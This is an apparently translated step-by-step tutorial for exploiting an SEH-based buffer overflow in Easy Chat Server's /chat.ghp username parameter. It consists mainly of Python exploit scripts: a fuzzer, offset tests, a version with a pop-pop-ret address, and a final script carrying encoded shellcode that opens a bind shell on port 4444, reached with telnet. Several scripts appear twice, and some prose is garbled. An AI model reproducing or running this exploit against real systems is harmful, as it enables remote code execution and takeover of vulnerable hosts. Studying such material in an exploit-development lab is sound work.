First make sure the easy chat server is installed in windows XP3 then try running application easy server chat
After we get our selanjutna vulner fuzzer created as shown below
#!/usr/bin/python
import socket
buf = "\x41" * 10000
buffer= "GET /chat.ghp?username="+buf+"&password=ywd&room=1&sex=0 HTTP/1.1\r\n\r\n"
buffer+= "Host: 192.168.43.2\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.2',80))
s.send(buffer + "\r\n\r\n")
s.close()
Next try to running easy chat server, start service and running ollydbg
Open Seh chain how click menu view and select seh chain
Press Shift + F9
Select the third row in the stack, right click and select follow dump
Next step select modul and copy to batract here I using modul Wininet.dll
double click and ctrl + F
And then try the module that we use in this way under this
Next we create a string in a way
And try running easy and ollydbg
Value EIP change
And now we decide on how many bytes to EIP and stack hit
See above the value EIP = 220 and stack= 216
Next step Edit fuzzer
#!/usr/bin/python
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (10008-len(buffer))
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (10008-len(buffer))
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()
RESULT
See above the value of EIP stricken X41
Next step edit fuzzer again
#!/usr/bin/python
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x34\x47\x00\x63"
buffer+="\x90"*(10008-len(buffer))
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()
#!/usr/bin/python
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x34\x47\x00\x63"
buffer+="\x90"*(10008-len(buffer))
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()
And next Open new console
And next open address to web browser and select payload
#!/usr/bin/python
import socket
buffer="GET /chat.ghp?username="
buffer+="\x90" * 216
buffer+="\xeb\x06\x90\x90"
buffer+="\x34\x47\x00\x63"
buffer+="\x90"*(10008-len(buffer))
buffer+="\x90" * 16
buffer+=("\x33\xc9\xd9\xcd\xb1\x51\xd9\x74\x24\xf4\xb8\xc5\xf9\x47\x64\x5e"
"\x83\xc6\x04\x31\x46\x11\x03\x83\xe8\xa5\x91\xf7\x61\xc1\x17\xef"
"\x8f\xea\x57\x10\x0f\x9e\xc4\xca\xf4\x2b\x51\x2e\x7e\x57\x5f\x36"
"\x81\x47\xd4\x89\x99\x1c\xb4\x35\x9b\xc9\x02\xbe\xaf\x86\x94\x2e"
"\xfe\x58\x0f\x02\x85\x99\x44\x5d\x47\xd3\xa8\x60\x85\x0f\x46\x59"
"\x5d\xf4\x8f\xe8\xb8\x7f\x90\x36\x42\x6b\x49\xbd\x48\x20\x1d\x9e"
"\x4c\xb7\xca\x23\x41\x3c\x85\x4f\xbd\x5e\xf7\x4c\x8c\x85\x93\xd9"
"\xac\x09\xd7\x9d\x3e\xe1\x97\x01\x92\x7e\x17\x31\xb2\xe8\x16\x0f"
"\x44\x05\x76\x70\x8e\xb3\x24\xe8\x47\x0f\xf9\x9c\xe0\x1c\xcf\x03"
"\x5b\x1c\xff\xd3\xa8\x0f\xfc\x18\x7f\x2f\x2b\x01\xf6\x2a\xb2\x3c"
"\xe5\xbd\x39\x6b\x9c\xbf\xc2\x43\x08\x19\x35\x96\x64\xce\xb9\x8e"
"\x24\xa2\x16\x7d\x98\x07\xca\xc2\x4d\x77\x3c\xa2\x19\x96\xe1\x4c"
"\x89\x11\xf8\x05\x45\x86\xe1\x55\x51\x91\xea\x43\x37\x0e\x44\x3e"
"\x37\xfe\x0e\x64\x6a\xd1\x27\x33\x8a\xf8\xeb\xee\x8b\xd5\x64\xf5"
"\x3d\x50\x3d\xa2\x42\x8a\xee\x18\xe9\x66\xf0\x70\x82\xe1\xe9\x09"
"\x63\x88\xa2\x16\xbd\x3e\xb2\x38\x24\xab\x28\xde\xc1\x48\xdc\x97"
"\xf7\xe5\x4e\xfe\xde\x35\xe7\xe7\x4b\x82\x71\x05\xba\xca\x71\x63"
"\x43\x88\x58\x8d\xfe\x21\x30\xfc\x85\x01\x9d\x55\xd2\x1a\x93\x57"
"\x96\xcd\xac\xd2\x9d\x0e\x84\x47\x49\xa3\x78\x26\x24\x29\x7a\x99"
"\x97\xf8\x2d\xe6\xc8\x6b\x63\xc1\xec\xa5\x28\x0e\x38\x53\x30\x0f"
"\xf2\x5b\x1e\x64\xaa\x5f\x1c\xbe\x31\x5f\xf5\x6c\x45\x4f\x92\xee"
"\x61\x92\x10\x5d\x6d\x85\x28\xb1")
buffer+="&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.101',80))
s.send(buffer + "\r\n\r\n")
s.close()
And now type command telnet 192.168.56.101 4444 (enter)
And see what happened to the easy chat
And see what happened to the easy chat
"GOOD LUCK"
